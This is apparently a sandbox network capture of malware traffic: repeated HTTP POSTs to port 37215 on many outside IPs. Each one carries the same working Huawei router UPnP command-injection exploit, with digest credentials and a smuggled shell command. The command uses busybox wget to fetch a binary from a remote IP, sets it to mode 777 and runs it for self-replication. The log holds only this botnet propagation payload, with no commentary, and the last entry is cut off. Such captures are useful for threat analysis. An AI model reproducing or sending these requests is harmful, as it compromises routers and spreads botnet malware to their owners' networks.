                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2434192.168.2.1355230197.227.29.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.629554033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2435192.168.2.135355675.85.45.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.629579067 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2436192.168.2.133576634.21.116.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.629616022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2437192.168.2.136026235.33.193.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.630601883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2438192.168.2.1351544197.33.143.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.630630970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2439192.168.2.135368641.238.201.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.630633116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2440192.168.2.1350404157.151.14.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.630724907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2441192.168.2.1340564189.12.168.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.630738020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2442192.168.2.1344780157.203.35.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.630747080 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2443192.168.2.1352092157.138.163.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.630773067 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 